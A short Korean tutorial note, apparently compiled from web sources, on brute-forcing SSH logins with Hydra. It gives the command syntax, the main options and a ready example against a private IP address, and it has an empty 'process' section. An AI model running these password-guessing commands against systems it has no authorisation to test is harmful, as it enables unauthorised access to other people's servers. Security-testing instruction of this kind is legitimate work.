Hydra를 사용하여 SSH 연결에 대한 brute force 공격을 수행하는 과정은 다음과 같습니다:
기본 구문:
hydra -l [username] -P [password_list] [target_ip] ssh
주요 옵션:
-l: 단일 사용자 이름 지정-L: 사용자 이름 목록 파일 지정 -p: 단일 비밀번호 지정-P: 비밀번호 목록 파일 지정-t: 병렬 작업(스레드) 수 설정 (SSH의 경우 4 권장)-s: SSH 포트 번호 지정 (기본값 22가 아닌 경우)-V: 상세 출력 모드-e nsr: null 비밀번호, 사용자 이름과 동일한 비밀번호, 역순 비밀번호 시도예시:
hydra -L users.txt -P passwords.txt 192.168.1.100 ssh -t 4
과정:
주의사항:
Hydra는 강력한 도구이므로 책임감 있게 사용해야 하며, 보안 테스트 목적으로만 활용해야 합니다.
Citations:
[1] https://armur.ai/tutorials/hydra/hydra/brute_force_ssh_connections/
[2] https://linuxconfig.org/ssh-password-testing-with-hydra-on-kali-linux
[3] https://www.geeksforgeeks.org/how-to-use-hydra-to-brute-force-ssh-connections/
+추가예정